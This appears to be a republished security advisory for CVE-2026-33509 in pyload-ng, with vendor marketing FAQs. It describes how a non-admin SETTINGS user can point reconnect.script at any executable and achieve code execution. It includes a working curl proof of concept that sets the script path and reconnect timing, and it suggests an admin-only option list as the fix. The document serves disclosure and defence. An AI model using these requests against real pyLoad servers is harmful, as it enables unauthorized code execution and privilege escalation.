Summary
The set_config_value() API endpoint allows users with the non-admin SETTINGS permission to modify any configuration option without restriction. The reconnect.script config option controls a file path that is passed directly to subprocess.run() in the thread manager's reconnect logic. A SETTINGS user can set this to any executable file on the system, achieving Remote Code Execution. The only validation in set_config_value() is a hardcoded check for general.storage_folder, all other security-critical settings including reconnect.script are writable without any allowlist or path restriction.
Details
The vulnerability chain spans two components:
1. Unrestricted config write, src/pyload/core/api/__init__.py:210-243
@permission(Perms.SETTINGS)
@post
def set_config_value(self, category: str, option: str, value: Any, section: str = "core") -> None:
self.pyload.addon_manager.dispatch_event(
"config_changed", category, option, value, section
)
if section == "core":
if category == "general" and option == "storage_folder":
# Forbid setting the download folder inside dangerous locations
# ... validation only for storage_folder ...
return
self.pyload.config.set(category, option, value) # No validation for any other option
The Perms.SETTINGS permission (value 128) is a non-admin permission flag. The only hardcoded validation is for general.storage_folder. The reconnect.script option is written directly to config with no path validation, allowlist, or sanitization.
2. Arbitrary script execution, src/pyload/core/managers/thread_manager.py:157-199
def try_reconnect(self):
if not (
self.pyload.config.get("reconnect", "enabled")
and self.pyload.api.is_time_reconnect()
):
return False
# ... checks if active downloads want reconnect ...
reconnect_script = self.pyload.config.get("reconnect", "script")
if not os.path.isfile(reconnect_script):
self.pyload.config.set("reconnect", "enabled", False)
self.pyload.log.warning(self._("Reconnect script not found!"))
return
# ... reconnect logic ...
try:
subprocess.run(reconnect_script) # Executes attacker-controlled path
except Exception:
# ...
The reconnect_script value comes directly from config. The only check is os.path.isfile(), the file must exist but there is no allowlist, no path restriction, and no signature verification.
3. Attacker also controls timing via same SETTINGS permission
The attacker can set reconnect.enabled=True, reconnect.start_time, and reconnect.end_time through the same set_config_value() endpoint to control when execution occurs. toggle_reconnect() at line 321 requires only Perms.STATUS, an even lower privilege.
4. Additional privilege escalation via config access
Beyond RCE, the same unrestricted config write allows SETTINGS users to:
- Read proxy credentials (
proxy.username/proxy.password) in plaintext viaget_config() - Redirect syslog to an attacker-controlled server (
log.syslog_host/log.syslog_port) - Disable SSL (
webui.use_ssl=False), rebind to0.0.0.0(webui.host) - Modify SSL certificate/key paths to enable MITM
PoC
Step 1: Set reconnect script to an attacker-controlled executable
Via API:
# Authenticate and get session (as user with SETTINGS permission)
curl -c cookies.txt -X POST 'http://target:8000/api/login' \
-d 'username=settingsuser&password=pass123'
# Set reconnect script to a known executable on the system
curl -b cookies.txt -X POST 'http://target:8000/api/set_config_value' \
-d 'category=reconnect&option=script&value=/tmp/exploit.sh§ion=core'
Via Web UI:
curl -b cookies.txt -X POST 'http://target:8000/json/save_config?category=core' \
-d 'reconnect|script=/tmp/exploit.sh&reconnect|enabled=True'
Step 2: Enable reconnect and set timing window
curl -b cookies.txt -X POST 'http://target:8000/api/set_config_value' \
-d 'category=reconnect&option=enabled&value=True§ion=core'
curl -b cookies.txt -X POST 'http://target:8000/api/set_config_value' \
-d 'category=reconnect&option=start_time&value=00:00§ion=core'
curl -b cookies.txt -X POST 'http://target:8000/api/set_config_value' \
-d 'category=reconnect&option=end_time&value=23:59§ion=core'
Step 3: Script executes when thread manager calls try_reconnect()
The thread manager's run() method (called repeatedly by the core loop) invokes try_reconnect(), which calls subprocess.run(reconnect_script) at thread_manager.py:199.
Note on exploitation constraints: The file at the target path must exist (os.path.isfile() check) and be executable. With shell=False (subprocess.run default), no arguments are passed. If the attacker also has ADD permission (common for non-admin users), they can use pyLoad to download an archive containing an executable script, which may retain execute permissions after extraction.
Impact
- Remote Code Execution: A non-admin user with SETTINGS permission can execute arbitrary programs on the server as the pyLoad process user
- Privilege escalation: The SETTINGS permission is described as "can access settings", granting it is not expected to grant arbitrary code execution capability
- Credential exposure: SETTINGS users can read proxy credentials, SSL key paths, and other sensitive config values via
get_config() - Network reconfiguration: SETTINGS users can disable SSL, change bind address, redirect logging, and modify other security-critical network settings
The application assigns, modifies, tracks, or checks privileges incorrectly, allowing a user to gain elevated access. Typical impact: privilege escalation beyond the intended level.
CVE-2026-33509 has a CVSS score of 7.5 (High). The vector is network-reachable, low privileges required, and no user interaction. A CVSS score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether this affects your application depends on whether the vulnerable code is present and reachable in your environment. No fixed version is listed yet, so configuration controls and monitoring matter more in the interim.
Affected versions
Security releases
Kodem intelligence
Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.
Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.
Remediation advice
Add an allowlist or category-level restriction in set_config_value() that prevents non-admin users from modifying security-critical options:
# In set_config_value(), after the storage_folder check:
ADMIN_ONLY_OPTIONS = {
("reconnect", "script"),
("webui", "host"),
("webui", "use_ssl"),
("webui", "ssl_cert"),
("webui", "ssl_key"),
("log", "syslog_host"),
("log", "syslog_port"),
("proxy", "username"),
("proxy", "password"),
}
if section == "core" and (category, option) in ADMIN_ONLY_OPTIONS:
# Require ADMIN role for security-critical settings
if not self.pyload.api.user_data.get("role") == Role.ADMIN:
raise PermissionError(f"Admin role required to modify {category}.{option}")
Additionally, consider validating the reconnect.script path against an allowlist of directories or requiring admin approval for script path changes.
Frequently Asked Questions
- What is CVE-2026-33509? CVE-2026-33509 is a high-severity improper privilege management vulnerability in pyload-ng (pip), affecting versions >= 0.4.0, <= 0.5.0b3.dev96. No fixed version is listed yet. The application assigns, modifies, tracks, or checks privileges incorrectly, allowing a user to gain elevated access.
- How severe is CVE-2026-33509? CVE-2026-33509 has a CVSS score of 7.5 (High). This score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether it represents real risk in your environment depends on whether the vulnerable code is present and reachable.
- Which versions of pyload-ng are affected by CVE-2026-33509? pyload-ng (pip) versions >= 0.4.0, <= 0.5.0b3.dev96 is affected.
- Is there a fix for CVE-2026-33509? No fixed version is listed for CVE-2026-33509 yet. Monitor the advisory for updates and apply mitigations in the interim.
- Is CVE-2026-33509 exploitable, and should I be worried? Whether CVE-2026-33509 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk. Get a demo
- What actually determines whether CVE-2026-33509 is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
- How do I fix CVE-2026-33509? No fixed version is listed yet. In the interim: Keep the dependency up to date. Apply the principle of least privilege and audit privilege transitions.